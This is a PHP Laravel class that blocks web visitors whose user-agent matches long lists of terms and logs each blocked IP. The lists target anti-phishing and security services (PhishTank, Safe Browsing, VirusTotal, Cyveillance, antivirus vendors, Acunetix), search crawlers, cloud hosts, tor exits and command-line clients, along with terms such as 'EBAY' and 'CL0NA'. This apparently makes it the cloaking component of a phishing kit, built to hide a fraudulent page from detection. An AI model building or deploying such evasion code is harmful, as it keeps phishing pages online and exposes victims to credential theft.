<?php

namespace App\Services\Antibots\Rules\Guard;

class BlockUa
{
    public $blocked_words = [
         "bot",
        "above",
        "google",
        "docomo",
        "mediapartners",
        "phantomjs",
        "lighthouse",
        "reverseshorturl",
        "samsung-sgh-e250",
        "softlayer",
        "amazonaws",
        "cyveillance",
        "crawler",
        "gsa-crawler",
        "phishtank",
        "dreamhost",
        "netpilot",
        "calyxinstitute",
        "tor-exit",
        "apache-httpclient",
        "lssrocketcrawler",
        "crawler",
        "urlredirectresolver",
        "jetbrains",
        "spam",
        "windows 95",
        "windows 98",
        "acunetix",
        "netsparker",
        "007ac9",
        "008",
        "Feedfetcher",
        "192.comagent",
        "200pleasebot",
        "360spider",
        "4seohuntbot",
        "50.nu",
        "a6-indexer",
        "admantx",
        "amznkassocbot",
        "aboundexbot",
        "aboutusbot",
        "abrave spider",
        "accelobot",
        "acoonbot",
        "addthis.com",
        "adsbot-google",
        "ahrefsbot",
        "alexabot",
        "amagit.com",
        "analytics",
        "antbot",
        "apercite",
        "aportworm",
        "EBAY",
        "CL0NA",
        "jabber",
        "ebay",
        "arabot",
        "hotmail!",
        "msn!",
        "baidu",
        "outlook!",
        "outlook",
        "msn",
        "duckduckbot",
        "hotmail",
        "go-http-client",
        "go-http-client/1.1",
        "trident",
        "presto",
        "virustotal",
        "unchaos",
        "dreampassport",
        "sygol",
        "nutch",
        "privoxy",
        "zipcommander",
        "neofonie",
        "abacho",
        "acoi",
        "acoon",
        "adaxas",
        "agada",
        "aladin",
        "alkaline",
        "amibot",
        "anonymizer",
        "aplix",
        "aspseek",
        "avant",
        "baboom",
        "anzwers",
        "anzwerscrawl",
        "crawlconvera",
        "del.icio.us",
        "camehttps",
        "annotate",
        "wapproxy",
        "translate",
        "feedfetcher",
        "ask24",
        "asked",
        "askaboutoil",
        "fangcrawl",
        "amzn_assoc",
        "bingpreview",
        "dr.web",
        "drweb",
        "bilbo",
        "blackwidow",
        "sogou",
        "sogou-test-spider",
        "exabot",
        "externalhit",
        "ia_archiver",
        "googletranslate",
        "translate",
        "proxy",
        "dalvik",
        "quicklook",
        "seamonkey",
        "sylera",
        "safebrowsing",
        "safesurfingwidget",
        "preview",
        "whatsapp",
        /*"telegram",*/
        "instagram",
        "zteopen",
        "icoreservice"
    ];

    public $bot = [
        "abot",
        "dbot",
        "ebot",
        "hbot",
        "kbot",
        "lbot",
        "mbot",
        "nbot",
        "obot",
        "pbot",
        "rbot",
        "sbot",
        "tbot",
        "vbot",
        "ybot",
        "zbot",
        "bot.",
        "bot/",
        "_bot",
        ".bot",
        "/bot",
        "-bot",
        ":bot",
        "(bot",
        "crawl",
        "slurp",
        "spider",
        "seek",
        "avg",
        "avira",
        "bitdefender",
        "kaspersky",
        "sophos",
        "virustotal",
        "virus",
        "accoona",
        "acoon",
        "adressendeutschland",
        "ah-ha.com",
        "ahoy",
        "altavista",
        "ananzi",
        "anthill",
        "appie",
        "arachnophilia",
        "arale",
        "araneo",
        "aranha",
        "architext",
        "aretha",
        "arks",
        "asterias",
        "atlocal",
        "atn",
        "atomz",
        "augurfind",
        "backrub",
        "bannana_bot",
        "baypup",
        "bdfetch",
        "big brother",
        "biglotron",
        "bjaaland",
        "blackwidow",
        "blaiz",
        "blog",
        "blo.",
        "bloodhound",
        "boitho",
        "booch",
        "bradley",
        "butterfly",
        "calif",
        "cassandra",
        "ccubee",
        "cfetch",
        "charlotte",
        "churl",
        "cienciaficcion",
        "cmc",
        "collective",
        "comagent",
        "combine",
        "computingsite",
        "csci",
        "curl",
        "cusco",
        "daumoa",
        "deepindex",
        "delorie",
        "depspid",
        "deweb",
        "die blinde kuh",
        "digger",
        "ditto",
        "dmoz",
        "docomo",
        "download express",
        "dtaagent",
        "dwcp",
        "ebiness",
        "ebingbong",
        "e-collector",
        "ejupiter",
        "emacs-w3 search engine",
        "esther",
        "evliya celebi",
        "ezresult",
        "falcon",
        "felix ide",
        "ferret",
        "fetchrover",
        "fido",
        "findlinks",
        "fireball",
        "fish search",
        "fouineur",
        "funnelweb",
        "gazz",
        "gcreep",
        "genieknows",
        "getterroboplus",
        "geturl",
        "glx",
        "goforit",
        "golem",
        "grabber",
        "grapnel",
        "gralon",
        "griffon",
        "gromit",
        "grub",
        "gulliver",
        "hamahakki",
        "harvest",
        "havindex",
        "helix",
        "heritrix",
        "hku www octopus",
        "homerweb",
        "htdig",
        "html index",
        "html_analyzer",
        "htmlgobble",
        "hubater",
        "hyper-decontextualizer",
        "ia_archiver",
        "ibm_planetwide",
        "ichiro",
        "iconsurf",
        "iltrovatore",
        "image.kapsi.net",
        "imagelock",
        "incywincy",
        "indexer",
        "infobee",
        "informant",
        "ingrid",
        "inktomisearch.com",
        "inspector web",
        "intelliagent",
        "internet shinchakubin",
        "ip3000",
        "iron33",
        "israeli-search",
        "ivia",
        "jack",
        "jakarta",
        "javabee",
        "jetbot",
        "jumpstation",
        "katipo",
        "kdd-explorer",
        "kilroy",
        "knowledge",
        "kototoi",
        "kretrieve",
        "labelgrabber",
        "lachesis",
        "larbin",
        "legs",
        "libwww",
        "linkalarm",
        "link validator",
        "linkscan",
        "lockon",
        "lwp",
        "lycos",
        "magpie",
        "mantraagent",
        "mapoftheinternet",
        "marvin/",
        "mattie",
        "mediafox",
        "mediapartners",
        "mercator",
        "merzscope",
        "microsoft url control",
        "minirank",
        "miva",
        "mj12",
        "mnogosearch",
        "moget",
        "monster",
        "moose",
        "motor",
        "multitext",
        "muncher",
        "muscatferret",
        "mwd.search",
        "myweb",
        "najdi",
        "nameprotect",
        "nationaldirectory",
        "nazilla",
        "ncsa beta",
        "nec-meshexplorer",
        "nederland.zoek",
        "netcarta webmap engine",
        "netmechanic",
        "netresearchserver",
        "netscoop",
        "newscan-online",
        "nhse",
        "nokia6682/",
        "nomad",
        "noyona",
        "siteexplorer",
        "nutch",
        "nzexplorer",
        "objectssearch",
        "occam",
        "omni",
        "open text",
        "openfind",
        "openintelligencedata",
        "orb search",
        "osis-project",
        "pack rat",
        "pageboy",
        "pagebull",
        "page_verifier",
        "panscient",
        "parasite",
        "partnersite",
        "patric",
        "pear.",
        "pegasus",
        "peregrinator",
        "pgp key agent",
        "phantom",
        "phpdig",
        "picosearch",
        "piltdownman",
        "pimptrain",
        "pinpoint",
        "pioneer",
        "piranha",
        "plumtreewebaccessor",
        "pogodak",
        "poirot",
        "pompos",
        "poppelsdorf",
        "poppi",
        "popular iconoclast",
        "psycheclone",
        "publisher",
        "python",
        "rambler",
        "raven search",
        "roach",
        "road runner",
        "roadhouse",
        "robbie",
        "robofox",
        "robozilla",
        "rules",
        "salty",
        "sbider",
        "scooter",
        "scoutjet",
        "scrubby",
        "search.",
        "searchprocess",
        "semanticdiscovery",
        "senrigan",
        "sg-scout",
        "shai'hulud",
        "shark",
        "shopwiki",
        "sidewinder",
        "sift",
        "silk",
        "simmany",
        "site searcher",
        "site valet",
        "sitetech-rover",
        "skymob.com",
        "sleek",
        "smartwit",
        "sna-",
        "snappy",
        "snooper",
        "sohu",
        "speedfind",
        "sphere",
        "sphider",
        "spinner",
        "spyder",
        "steeler/",
        "suke",
        "suntek",
        "supersnooper",
        "surfnomore",
        "sven",
        "sygol",
        "szukacz",
        "tach black widow",
        "tarantula",
        "templeton",
        "/teoma",
        "t-h-u-n-d-e-r-s-t-o-n-e",
        "theophrastus",
        "titan",
        "titin",
        "tkwww",
        "toutatis",
        "t-rex",
        "tutorgig",
        "twiceler",
        "twisted",
        "ucsd",
        "udmsearch",
        "url check",
        "updated",
        "vagabondo",
        "valkyrie",
        "verticrawl",
        "victoria",
        "vision-search",
        "volcano",
        "voyager/",
        "voyager-hc",
        "w3c_validator",
        "w3m2",
        "w3mir",
        "walker",
        "wallpaper",
        "wanderer",
        "wauuu",
        "wavefire",
        "web core",
        "web hopper",
        "web wombat",
        "webbandit",
        "webcatcher",
        "webcopy",
        "webfoot",
        "weblayers",
        "weblinker",
        "weblog monitor",
        "webmirror",
        "webmonkey",
        "webquest",
        "webreaper",
        "websitepulse",
        "websnarf",
        "webstolperer",
        "webvac",
        "webwalk",
        "webwatch",
        "webwombat",
        "webzinger",
        "wget",
        "whizbang",
        "whowhere",
        "wild ferret",
        "worldlight",
        "wwwc",
        "wwwster",
        "xenu",
        "xget",
        "xift",
        "xirq",
        "yandex",
        "yanga",
        "yeti",
        "yodao",
        "zao/",
        "zippp",
        "zyborg",
        "proximic",
        "Googlebot",
        "Baiduspider",
        "Cliqzbot",
        "A6-Indexer",
        "AhrefsBot",
        "Genieo",
        "BomboraBot",
        "CCBot",
        "URLAppendBot",
        "DomainAppender",
        "msnbot-media",
        "Antivirus",
        "YoudaoBot",
        "MJ12bot",
        "linkdexbot",
        "Go-http-client",
        "presto",
        "BingPreview",
        "go-http-client",
        "go-http-client/1.1",
        "trident",
        "presto",
        "virustotal",
        "unchaos",
        "dreampassport",
        "sygol",
        "nutch",
        "privoxy",
        "zipcommander",
        "neofonie",
        "abacho",
        "acoi",
        "acoon",
        "adaxas",
        "agada",
        "aladin",
        "alkaline",
        "amibot",
        "anonymizer",
        "aplix",
        "aspseek",
        "avant",
        "baboom",
        "anzwers",
        "anzwerscrawl",
        "crawlconvera",
        "del.icio.us",
        "camehttps",
        "annotate",
        "wapproxy",
        "translate",
        "feedfetcher",
        "ask24",
        "asked",
        "askaboutoil",
        "fangcrawl",
        "amzn_assoc",
        "bingpreview",
        "dr.web",
        "drweb",
        "bilbo",
        "blackwidow",
        "sogou",
        "sogou-test-spider",
        "exabot",
        "externalhit",
        "ia_archiver",
        "mj12",
        "okhttp",
        "simplepie",
        "curl",
        "wget",
        "virus",
        "pipes",
        "antivirus",
        "python",
        "ruby",
        "avast",
        "firebird",
        "scmguard",
        "adsbot",
        "weblight",
        "favicon",
        "analytics",
        "insights",
        "headless",
        "github",
        "node",
        "agusescan",
        "zteopen"
    ];
    public function run()
    {
        $ip = request()->ip();
        $userAgent = request()->userAgent();
        $dp = strtolower($userAgent);

        if($userAgent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" || $userAgent == "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)") {
            $this->logDetection($ip, $userAgent);
                abort(403, 'Forbidden');
        }

        if($userAgent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)") {
            $this->logDetection($ip, $userAgent);
                abort(403, 'Forbidden');
        }

        if(strpos($userAgent, 'favicon') || strpos($userAgent, 'Java') || strpos($userAgent, 'FreeBSD') || strpos($userAgent, 'msnbot') || strpos($userAgent, 'Yahoo! Slurp') || strpos($userAgent, 'YahooSeeker') || strpos($userAgent, 'Googlebot') || strpos($userAgent, 'bingbot') || strpos($userAgent, 'crawler') || strpos($userAgent, 'PycURL') || strpos($userAgent, 'facebookexternalhit') !== false){
            $this->logDetection($ip, $userAgent);
            abort(403, 'Forbidden');
        }


        foreach ($this->blocked_words as $word2) {
            if (substr_count($dp, strtolower($word2)) > 0 or $dp == "" or $dp == " " or $dp == "    ")
             {
                // IPs exentas
                $exemptIps = ['91.108.5.7', '205.210.31.19', '91.108.5.49', '40.113.118.83'];
                if (in_array($ip, $exemptIps)) {
                    return; // No bloquear estas IPs
                }

                $this->logDetection($ip, $userAgent);
                abort(403, 'Forbidden');
            }
        }

        foreach ($this->bot as $BotType) {
        if (stripos($userAgent, $BotType) !== false) {
            // IPs exentas
            $exemptIps = ['91.108.5.7', '205.210.31.19', '91.108.5.49', '40.113.118.83'];
            if (in_array($ip, $exemptIps)) {
                return; // No bloquear estas IPs
            }

            $this->logDetection($ip, $userAgent);
            abort(403, 'Forbidden');
        }
    }
    }

    public function logDetection(string $ip, string $userAgent): void
    {
        // Guardar en archivo bloqueados.log
        file_put_contents(
            storage_path('logs/resultados/bloqueados.log'),
            "BLOQUEADO BY USERAGENT || user-agent: $userAgent\nIP: $ip || " . gmdate("Y-n-d") . " ----> " . gmdate("H:i:s") . "\n\n",
            FILE_APPEND
        );

        // Registrar IP en resultado_total.log
        file_put_contents(
            storage_path('logs/resultados/resultado_total.log'),
            "$ip (Detect by USERAGENT)\n",
            FILE_APPEND
        );
    }
}
